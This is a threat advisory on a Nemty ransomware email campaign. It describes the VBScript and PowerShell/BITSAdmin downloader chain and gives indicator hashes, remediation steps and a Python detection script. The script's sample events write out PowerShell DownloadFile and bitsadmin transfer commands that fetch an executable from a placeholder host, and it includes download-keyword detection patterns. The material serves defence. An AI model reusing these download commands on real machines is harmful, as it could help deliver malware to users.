
Rewterz Threat Alert – Nemty Ransomware: Asia Pacific Mailboxes Swarmed by Dual Downloaders

February 21, 2020

Severity

High

Analysis Summary

A new Nemty ransomware campaign shows a change in its distribution method. The first wave of Nemty activity spread via RDP and quickly moved to the Phorpiex botnet, which pushed the ransomware to SMB hosts with weak credentials. In this campaign Phorpiex is leveraged again, but this time to send spam. The emails carry a ZIP archive and a subject line that is simply a smiley emoji, most likely chosen to evade keyword-based spam filtering. Inside the ZIP archive is a VBScript file that downloads and executes the final payload. The script runs CMD in combination with both PowerShell and BITSAdmin, presumably so that the infection still succeeds if one download method is blocked by a firewall or AV. In some samples, garbage code was added to obfuscate the file and evade static detection. The Nemty ransomware itself is downloaded as an executable from a known Phorpiex server.

[Figure: VBScript downloader infection chain]
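The delivery chain described above gives a defender four concrete hooks: an emoji-only subject with a ZIP attachment, a VBScript member inside that ZIP, cmd.exe spawned by Windows Script Host and driving a PowerShell or BITSAdmin download, and the final executable's SHA-256 matching the IOC list. The following Python is an added example written for this advisory, not Rewterz tooling or code from the campaign; it implements those checks over constructed sample data. The Sysmon-style field names (parent image, image, command line) and the PowerShell download keywords are assumptions about the reader's telemetry, and the hash set is a subset of the IOCs listed below.

```python
"""Hunting logic for the Nemty VBScript downloader chain (added example).

All inputs are constructed for illustration: the ZIP is built in memory,
the process events are modelled on the chain in the Analysis Summary, and
the field names assume a Sysmon-style process-creation record.
"""
import io
import re
import zipfile
from dataclasses import dataclass

# Subset of the advisory's SHA-256 IOCs (extend with the full list below).
NEMTY_SHA256 = {
    "bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5",
    "0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2",
    "758c26dcf2a8963b3fcf3b6ea796aacf08870b9733ac87a608cd1be6b56af421",
    "e96ca035fc8a2c2ae2dc2e6c112942469821c6682beab8fa7ece1e25e55497ba",
}

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}   # run the VBScript attachment
SCRIPT_EXTS = (".vbs", ".vbe", ".wsf")           # script members worth flagging
# PowerShell download primitives (assumed keyword list, not from the advisory).
PS_DOWNLOAD = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    re.I)
# bitsadmin invoked with /transfer, whether directly or via cmd /c.
BITS_TRANSFER = re.compile(r"bitsadmin(?:\.exe)?\b.*?/transfer", re.I)


def suspicious_subject(subject: str) -> bool:
    """True when the subject carries no letters or digits at all (e.g. a lone
    emoji), the trick used here to slip past keyword-based spam filters."""
    s = subject.strip()
    return bool(s) and not any(ch.isalnum() for ch in s)


def script_members(zip_bytes: bytes) -> list:
    """Names of script files inside a ZIP attachment, read without extracting."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [n for n in zf.namelist() if n.lower().endswith(SCRIPT_EXTS)]


def make_sample_zip() -> bytes:
    """Constructed attachment: a ZIP holding a harmless one-line VBScript stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.vbs", "' placeholder stub, not the real downloader\r\n")
    return buf.getvalue()


def _basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str
    sha256: str = ""


def classify(ev: ProcEvent) -> list:
    """Detection labels for one process-creation event."""
    hits = []
    parent, image, cmd = _basename(ev.parent_image), _basename(ev.image), ev.command_line
    if parent in SCRIPT_HOSTS and image == "cmd.exe":
        hits.append("wsh_spawns_cmd")
    if (image in ("powershell.exe", "pwsh.exe") or "powershell" in cmd.lower()) \
            and PS_DOWNLOAD.search(cmd):
        hits.append("powershell_download")
    if BITS_TRANSFER.search(cmd):
        hits.append("bitsadmin_transfer")
    if ev.sha256.lower() in NEMTY_SHA256:
        hits.append("ioc_hash_match")
    return hits


# Constructed events modelled on the chain in the summary (example.invalid is a placeholder host).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe",
              r'cmd /c powershell -w hidden (New-Object Net.WebClient).DownloadFile("http://example.invalid/a.exe","%TEMP%\a.exe")'),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer j /download /priority high http://example.invalid/a.exe %TEMP%\a.exe"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Users\u\AppData\Local\Temp\a.exe", "a.exe",
              sha256="bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd /c dir"),  # benign
]


def triage(events) -> dict:
    """Map event index -> labels, for events that tripped at least one rule."""
    out = {}
    for i, ev in enumerate(events):
        labels = classify(ev)
        if labels:
            out[i] = labels
    return out


if __name__ == "__main__":
    print("subject flagged:", suspicious_subject("\U0001F642"))
    print("scripts in zip:", script_members(make_sample_zip()))
    for i, labels in triage(SAMPLE_EVENTS).items():
        print(i, labels)
```

The subject check flags any subject without letters or digits, so a plain ":)" or "!!!" trips it as well; treat it as a signal to combine with the ZIP-plus-script check rather than a blocking rule on its own. The hash match only catches the specific samples listed, whereas the wscript-to-cmd-to-PowerShell/BITSAdmin pattern survives repacking, which is why both are kept.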

Impact

File Encryption

Indicators of Compromise

SHA-256

  • bc7e55048478507b6734c8314857f33309f663ff4f3c3cb65e653a5b308f0bd5
  • 0517ae27126f767937976d733064869a1b5296aaf622596af6cd4c4aa2184bd2
  • 069390b186ce9a3678441d208a5614340d4b2a0a7bbe2991e3087b72e7480112
  • 06cf3e872a886db4ed77639eebe08361f9a81d4908ee643de0135f491f690923
  • 06df03c989148bcbee007b66216a4fdcec635491922fd744a32315010ba99d2a
  • 07c2632f548015a0e61d14b8f5a9e4e988c1674fcc02a90a87d3d94afe0c8135
  • 080cb0ad0d69490097f641311186147e8b16954d23885630a7231f7ff5bd8bda
  • 0c0c467b094b13943ea7d2b5f91fb19e81c6b521a7a58c27e571ed33a56d8ccb
  • 0da9aa96f41ad1cc117dcff1272521a0b9be55e59635704af897169268ef2db7
  • 0f49c5375ac7aac76caf8cb0dfd16b8f422e197162c36a4a4ba1449cd08e5056
  • 12294dbc60c9b9935abdbba25da98b0314f82da9252e29229860ee4e346aa6ad
  • 1261860de3fd1ea3e59f61572f12c2efa41d460896a46ef8731787724f8845ca
  • 150b1e4155894701c4b8919413b73d4eebc1d781c4203f54a0713b552f6961be
  • 160402da510e6c751bef39ab6af152ef71d7a25c710a8d88586dc56b5bfe1170
  • 170d3ddddc64a9feca1fc5ef77b5c1fd0b86b8fb98a91256070ad7be7cf0e619
  • 18b656b27704b9fe418d55f5472bda0b2ffe5ae8eb26b910f4db4029fb8a9f7e
  • 25a29351100b75f30ae133a3e035b2852298bbe05b9fd08f73a4a8fda52c439d
  • 2f3bed3382382b95c84390b6138f68875ce96273fa5f521bab83d67b8e9ad740
  • 758c26dcf2a8963b3fcf3b6ea796aacf08870b9733ac87a608cd1be6b56af421
  • b20e0ade92a2e824f66e991db75f9ef8b9260e9acda55d52b0d9e1c0936919f8
  • e96ca035fc8a2c2ae2dc2e6c112942469821c6682beab8fa7ece1e25e55497ba

Remediation

  • Block the SHA-256 indicators listed above at your respective controls (endpoint protection, email gateway, proxy).
  • Treat emails from unknown senders with suspicion, particularly those with a ZIP attachment and an empty or emoji-only subject line.
  • Never open attachments or click links sent by unknown senders; script files (such as .vbs) inside archives should not be executed.
  • Review endpoint telemetry for cmd.exe launched from wscript.exe or cscript.exe that in turn runs PowerShell or BITSAdmin to fetch an executable, the download chain described in this alert.